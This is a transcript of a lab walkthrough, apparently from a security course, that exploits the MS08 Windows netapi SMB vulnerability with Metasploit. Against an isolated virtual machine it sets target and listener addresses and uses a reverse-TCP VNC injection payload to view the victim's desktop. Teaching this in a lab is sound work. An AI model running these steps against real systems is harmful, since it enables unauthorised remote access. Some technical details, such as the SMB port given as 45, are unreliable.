Lab 5B, we're going to exploit the Windows netapi service. To do so, we're going to use Metasploit, which we had just recently updated. How do we know that we have that available to us to exploit? Well, we ran Nessus in an earlier lab and we discovered that that vulnerability was actually on this workstation. Let's get started. First, we're going to log in to our workstation here. This is our attack system starting up. I'm also going to start up If It Ain't Broke. That's our second station that we're going to need and our target for this lab. While that's starting up, I'm going to go ahead and open this PDF up so I can show you what it is that led us to this point. So if we look underneath vulnerabilities by plugins, we see that we do have this vulnerability available on a Windows system within our target network. It tells us right here the remote host is vulnerable to a buffer overrun in the server service that may allow an attacker to execute arbitrary code on the remote host with the system privileges. System privileges meaning that we have administrator rights, administrator access to do anything we want. This tells us the systems that are actually vulnerable to this. Here's a risk factor that was listed. It gave us an IP address right down here as well of what the host was that we discovered this on. It's a lot of information that helps us out. Let's go ahead, minimize that. Let's open up a terminal prompt and let's begin by first confirming our network connectivity. We want to make sure we cannot reach the outside. So when I ping Google's DNS, it's unreachable. That's great. Now let's see if we can still ping this host. How do we know that host is still online? Maybe we did this scan earlier, as we did with a few labs ago, but we're coming back to this network and we're saying, I don't know if that guy's still there or not, so let's take a look and see. 192.168.40.129, and we are getting a reply back. Let's confirm that we're not actually pinging ourselves here, and we can do that by running an ifconfig -a, and my address has it's changed a little bit. It's 192.168.40.131. Again, yours might be slightly different right here. Whatever you pulled up as your Windows system when you did your Nessus scan and your Nmap scan, that's what you're going to want to use here. If you do not see that system, for some reason this guy has booted up with a different address because it is a DHCP configuration, then you may have to run one more nmap in order to discover the address over here. Our first step here is to start the necessary services for Metasploit to run. So you want to type service PostgreSQL start. This is the database that is used by Metasploit. Next thing, we will run service Metasploit start. This is the actual Metasploit service itself. That allows us to start up the MSF console. Things have started up successfully. If you were receiving errors and Metasploit is not starting up, you want to check your lab manual on page 8081, and I kind of walk you through probably what's going on there. It's going to be this most likely, that you have not started the PostgreSQL and you have not started Metasploit. MSF console's there. We have our banner. First thing we're going to want to do is we're going to want to search out this exploit. We found it available to us when we did a scan. Now let's go ahead and search it through Metasploit and see what it says it can do. Well, with that vulnerability, you can run this exploitation against it. Here's a disclosure date of when this first became available. Here's a rank for listing how successful this should be if that vulnerability exists on a target. And there's a brief description for it right there. So we found what we need. We're going to go ahead and use the exploit Windows SMB MS08, and it'll autofill. Once you get there, now for you to autofill that, as you start to type it in, you hit tab. Hit tab once. If you hit tab more than once and more options exist, you're going to get a list of things to choose from there. So you hit enter at this point and it will load that as your exploit. With every exploit, you must determine what the options are that must be set for that exploit to be successful. Exploit that we're using is listed right here. It wants an R host. An R host is the actual IP address, the remote host, the location, the address of it. Now you must be on the same subnet if you're not pivoting through a network to get to a target. For us, we're keeping things within this VM environment. We're good to go just like we are by punching in the IP address. Our port is 45. That's what we're going to use to create the socket, the connection back to this device. So IP address, this port, and we're going to use the SMB pipe, which is the server message block pipe, which is used to expose this functionality. Now that we see what we have, let's set our host to the IP address that we used to ping earlier. To confirm that we have those options in place, let's do show options one more time, and you'll see now that my option has been set for my R host. And that is, again, the target address. Here's the SMB service port 45. You will see this exploit target. An ID of 0 is basically going to automatic target, meaning it will determine the OS and it will be able to adjust the coding appropriately so that it can exploit this. You can also set targets as well. If you want to see the list of what's available, your targets are basically your different flavors or versions of operating systems and languages. It gave us this, which is perfect for us. Otherwise, you would go through and you could specify an exact version or flavor of XP, which you would discover through your nmap-O scan. Next thing we're going to want to do is set our payload. Payloads are the coding that we're going to inject. They have VNC injections we can do. We can create connections to and from devices through binds and reverse TCP connections. We can use Meterpreter and try to load Meterpreter sessions to gain access to the workstation. You can see lots and lots and lots of options in here. Just try to invoke a shell on the workstation. For us, we're going to go ahead and have fun with this first one here, and we're going to try a VNC injection. So set payload, Windows VNC inject, and we'll do a reverse TCP. Now after you set your payloads, it's good practice to go back and check your options one more time, because different payloads might require different options to be set. Good thing we checked it, because here we go. We're doing a Windows VNC inject with a reverse TCP. Reverse TCP meaning we're going to inject coding to the IP address and port that we listed. It is then going to place a small amount of coding on this workstation, and it's going to have it do a reverse connection back to us. When it attempts to connect back to us and it's loading this, it has to understand what the address is that it's going to connect back to. We have a port that it's going to attach to, 4444, but we do need to specify an L host. You'll see some of these as required yes and no's. No's you do not have to set. Yes, they must be set in order for this to work. It does give us our default VNC port here. So let's go ahead and set our options now. It's going to be set L host 192.168.40.131. If you're not sure of what your IP address is, you can always open a new terminal, run ifconfig, and get your address from right there. Once that's set, we're going to hit enter, and let's show options one more time. We'll see that is set. That will be our listening address. That's what we're going to listen for. This guy, once we inject this coding over here to the IP and the R host under the port we listed, he will make a reverse connection. He's going to connect back to us at this address at this port. But we need to be listening. If we don't open a listener there and he tries to connect back, it does no good. So here we're opening a listener on our address at this port, so when a connection attempts to come in, we will respond. from our lab manual, this is that thin VNC tunnel that's going to be established. Here's our attack system. We're moving through the VMware switch. Here's our target. IP address is different. We're connecting to 129. Our address is actually 131, so this is going to change slightly, but that's the connection that's being established here, and it's coming this direction. He's connecting back to us. We're injecting this way. He's coming back to us to create a VNC connection. Now the fun's actually going to begin. We have our configuration set. We have all of our options set. At this point in time, we can simply exploit. And let's see what happens. There we go. He has created a VNC connection back to us. We can now view the desktop. If I were to come over here and click on anything, as you can see, we're catching it all over there. Now, we can't inject anything this way, but we can see exactly what's being done on the screen. If your desktop image is solid black right here, and this system's sitting at a screen where it went to sleep, you're going to have to wake this up first and then perform the function. Now you don't have to go this far. I'm going to show you our connection that's actually established here. See that we have a desktop. I'm going to run CMD to get a command prompt. Do a netstat -a, and you will notice that we have an established connection right here. Now as we went through the login prompt, we kind of lost it here. We could shut this guy down. VNC connection closed. Type exploit one more time, and we'll be able to see what they're doing again. So as certain actions happen, we might get dropped or just might not transfer properly, but we'll be able to reset and come back. But here we go. We see our connection is established from our XP station on this port back over here to our target. Now this is your deliverable. You do not need to log in. You do not need to show me this connection back and forth. I can simply judge off of the tight VNC window that's established and your data up here, take a screen capture of that, submit that with your lab so that you have shown me that you have performed lab 5B. Let's go ahead and exit out. You can exit that out, hit enter here, type exit, and let's do a reboot. Leave it in the host only configuration because we're going to come back and exploit our Linux system in lab 5C. See you in a minute.